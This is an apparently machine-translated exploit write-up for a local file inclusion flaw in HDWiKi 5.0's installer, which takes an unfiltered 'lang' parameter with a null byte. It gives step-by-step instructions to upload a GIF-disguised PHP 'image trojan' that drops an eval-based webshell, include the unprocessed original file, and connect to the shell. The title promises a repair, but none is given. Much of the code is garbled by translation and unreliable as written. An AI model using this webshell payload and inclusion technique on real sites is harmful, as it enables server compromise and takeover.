HDWiKi V 5.0 local 0-day and repair

Vulnerability file: installinstall. php

Key code:

<? Php
Error_reporting (E_ERROR | E_WARNING | E_PARSE );
Define (IN_HDWIKI, TRUE );
Define (HDWIKI_ROOT ,../);

$ Lang_name = $ _ COOKIE [lang_name];/* lang_name is directly stored from Cookies without any filtering */
If (isset ($ _ REQUEST [lang]) {/*

Checks whether the variable is set. Otherwise, the variable enters the program body.

*/
$ Lang_name = $ _ REQUEST [lang];/* The obtained Lang value in Get mode is not filtered and put directly into lang_name. Ignore the Cookies in the preceding value section .*/
Setcookie (lang_name, $ lang_name );
}
If (! $ Lang_name) {/* is bypassed if it is not null. Otherwise, lang_name is initialized */
$ Lang_name = zh;
}

Require HDWIKI_ROOT. "/lang/$ lang_name/install. php";/* simple bypass, OK ~ The entire section contains. % 00. If it is truncated, no error will occur .*/
Require HDWIKI_ROOT./version. php;
Require HDWIKI_ROOT./model/base. class. php;

Analysis:

From the source code, the problem exists. We only need to upload an image Trojan to include it normally. however, when the problem arises, HDWiKi will process the image during the upload process. It is not feasible to directly upload the PHP trojan in the image format, and it is not feasible to bind a Copy image and a Trojan, during debugging, I found that all the content in the uploaded image trojan was processed. cannot contain. however, in image processing, the program first checks whether the file header is in the image format. After a rough decision, the program will not directly upload the file to the server, but will process the image in the next step. this is why your PHP code is not found after the image Trojan is uploaded and opened in notepad. however, their upload module has a serious defect. when processing the image, the program stores the original file of the image on the remote server. and the PHP code is not processed by them. in this way, as long as the original file is included, the Shell can be obtained smoothly.

Exploitation process:

1. Register a user on the HDWiKi user's website.

2. upload an image trojan in personal management. The content is as follows:

---------------------------------------------------------------------------

Gif89a

<?
$ Fp = @ fopen ("HYrz. php", );
@ Fwrite ($ fp, <.? Php. "". eval ($ _ POST [a]). "? "."> ");
@ Fclose ($ fp );
?>

Bytes -----------------------------------------------------------------------------------------

3. Right-click to get the upload image address. For example: http://www.bkjia.com/uploads/userface/2/2.jpg? 0.8622666412804486 we only need http://www.bkjia.com/uploads/userface/2/2.jpg.

Although the address is obtained, but the file does not exist. We put 2.jpg to 2_src.jpg. For example: http://www.bkjia.com/uploads/userface/2/2_src.jpg.

 

4. Access: http://www.bkjia.com/install/install.php? Lang = ../uploads/userface/2/2_src.jpg % 00/* Note: here and above 2 are subject to the actual situation. If it is subject? Lang = ../uploads/userface/5/5_src.jpg % 00 */

 

5. One sentence connection: http://www.bkjia.com/install/HYrz.php password:

Test environment:

Web Server: Winxp + Apache 2.2.15

Allow_url_fopen On
Allow_url_include Off
Magic_quotes_gpc Off

From: HYrz